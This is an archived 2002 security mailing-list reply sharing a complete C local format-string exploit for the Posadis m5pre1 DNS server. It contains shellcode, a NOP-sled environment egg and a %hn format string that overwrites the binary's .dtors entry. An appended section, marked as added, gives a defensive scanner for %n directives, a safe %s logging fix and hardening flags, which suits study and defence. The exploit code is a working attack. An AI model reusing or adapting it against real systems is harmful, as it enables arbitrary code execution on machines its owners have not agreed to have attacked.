Re: bufferoverflow posadis m5pre - ( POC number 2 )
From: KF (dotslash@snosoft.com) Date: 04/17/02
- Previous message: eSDee: "gawk bufferoverflow"
- In reply to: eSDee: "bufferoverflow posadis m5pre2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Wed, 17 Apr 2002 13:58:57 -0400
From: KF <dotslash@snosoft.com>
To: eSDee <eSDee@netric.org>
We have been working on this issue for a while but have yet to exploit
it remotely. The posadis binary is not suid root by default if I
remember correctly... from my research on the issue I thought that it
may be possible to exploit this issue using a feature called "Hint
domains" but I have not been able to test this theory. Here is what we
came up with for the exploitation of the local binary ... I was holding
on to it until I worked out the remote exploitation but there is no
point now. =]
-KF
eSDee wrote:
>
>Netric Security Team - http://www.netric.org
>by eSDee
>
>Posadis m5pre2
>Type: Stackoverflow
>Priority: 2
>
...
/*
* Posadis m5pre1 DNS local format string exploit.
*
* The exploitation research was provided by KF / Snosoft (http://www.snosoft.com)
* Original hole was found by KKR of (http://dekode.org)
* Exploit coded up by The Itch / Promisc (http://www.promisc.org)
*
* This exploit was developed on the Snosoft vulnerability research machines
*
* - The Itch
* - itchie@promisc.org
*
* - Technical Difficulties -
*
* 1). Posadis messes with the bytes-written-so-far part, therefore an exact
* address cannot be written; it will be off by around 20 bytes from the
* address you specify.
* 2). STRANGELY, execve("/bin/sh", "sh", 0); will fail! (No error or anything;
* I checked with gdb, I get a SIGTRAP as it is supposed to, but the code will
* not be executed.) A shellcode that does execve("/tmp/p00p", "p00p", 0) did
* work. p00p is just a simple bash script.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execl */
#define NOP 0x90
#define EGGSIZE 2048
/* execve /tmp/p00p (courtesy of zillion), see /tmp/p00p */
char shellcode[] =
"\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x11\x89\x76\x12\x8d"
"\x5e\x08\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12"
"\x8d\x56\x1a\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68\x38\x2f\x74\x6d\x70\x2f\x70\x30\x30\x70\x32\x33\x34"
"\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65";
int main(int argc, char *argv[])
{
char *fmt;
char egg[EGGSIZE];
unsigned long smashaddr = 0x08063d14; /* overwrite (dtor section) */
char splitaddr0, splitaddr1, splitaddr2, splitaddr3;
splitaddr0 = (smashaddr & 0xff000000) >> 24;
splitaddr1 = (smashaddr & 0x00ff0000) >> 16;
splitaddr2 = (smashaddr & 0x0000ff00) >> 8;
splitaddr3 = (smashaddr & 0x000000ff);
if(!(fmt = malloc(256))) {printf("malloc()\n"); exit(-1);}
memset(fmt, 0x00, 256);
memset(egg, 0x00, EGGSIZE);
memset (egg, NOP, EGGSIZE - strlen (shellcode));
memcpy (egg + EGGSIZE - strlen (shellcode) - 1, shellcode,
strlen (shellcode));
/* Two target addresses (smashaddr and smashaddr + 2) as positional
* parameters 20 and 21, each written as a 16-bit half with %hn; the
* padding widths are tuned for this particular binary. */
sprintf(fmt,"AAA%c%c%c%c%c%c%c%c%%.49095u%%21$hn%%.15116u%%20$hn",
splitaddr3, splitaddr2, splitaddr1, splitaddr0,
splitaddr3 + 2, splitaddr2, splitaddr1, splitaddr0);
egg[EGGSIZE -1] = '\0';
/* Hand the NOP sled plus shellcode to the target through its environment. */
memcpy(egg, "EGG=", 4);
putenv(egg);
execl("/home/posadis-m5pre1/src/posadis", "posadis", fmt, NULL);
return 0;
}
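The defensive side of the bug class this post exploits, as an added example that is not part of the original post and not posadis code: a small scanner that recognises printf-style conversions (including the `%n` family and the positional `N$` arguments the exploit's format string relies on), plus the actual fix, which is to pass untrusted text as a `%s` argument and never as the format itself. All function names and sample strings below are constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Added example, not code from the original post or from posadis.
 * count_format_directives() is the detection side: it reports how many
 * conversions an untrusted string would trigger if it ever reached a
 * printf-family function as the format argument. log_safely() is the
 * fix. Names and sample inputs are constructed. */

/* Count '%' conversions in s, ignoring the literal "%%". If writes is
 * non-NULL it receives the number of %n-style conversions, which are the
 * ones that turn a format string bug into a memory write. */
int count_format_directives(const char *s, int *writes)
{
    int total = 0;
    if (writes)
        *writes = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')          /* "%%" prints a literal percent sign */
            continue;
        /* Skip flags, width, precision, "N$" positional index and
         * length modifiers (h, hh, l, ll, L, q, j, z, t). */
        while (*p && (strchr("-+ #0.$*", *p) != NULL ||
                      isdigit((unsigned char)*p) ||
                      strchr("hlLqjzt", *p) != NULL))
            p++;
        total++;                /* a conversion (or a dangling '%') */
        if (*p == '\0')
            break;
        if (*p == 'n' && writes)
            (*writes)++;
    }
    return total;
}

/* Convenience wrapper that returns only the dangerous subset. */
int count_write_directives(const char *s)
{
    int writes = 0;
    count_format_directives(s, &writes);
    return writes;
}

/* The fix: untrusted text goes through "%s" and is never itself the
 * format string. Returns what snprintf returns. */
int log_safely(char *out, size_t outsz, const char *user)
{
    return snprintf(out, outsz, "query: %s", user);
}

/* Returns 1 if every byte of user survives log_safely() unchanged,
 * i.e. nothing in it was interpreted as a conversion. */
int log_safely_preserves(const char *user)
{
    char buf[512];
    log_safely(buf, sizeof buf, user);
    return strncmp(buf, "query: ", 7) == 0 && strcmp(buf + 7, user) == 0;
}

int main(void)
{
    /* Constructed sample: the shape of the format string the exploit
     * above passes on the command line, minus the raw address bytes. */
    const char *hostile = "AAA%.49095u%21$hn%.15116u%20$hn";
    const char *benign  = "www.example.org";
    int total, writes;

    total = count_format_directives(hostile, &writes);
    printf("%-34s directives=%d writes=%d\n", hostile, total, writes);
    total = count_format_directives(benign, &writes);
    printf("%-34s directives=%d writes=%d\n", benign, total, writes);
    printf("log_safely keeps hostile input literal: %s\n",
           log_safely_preserves(hostile) ? "yes" : "no");
    return 0;
}
```

The scanner is a triage aid for logs or fuzzer output, not a substitute for the fix: the only robust remedy is the `"%s"` form in `log_safely()`. GCC's `-Wformat -Wformat-security` flags calls where the format is a non-literal with no arguments, which is exactly the pattern behind this bug, and linking with `-Wl,-z,relro` makes the destructor/fini tables (the `.dtors` entry this exploit overwrites) read-only after loading.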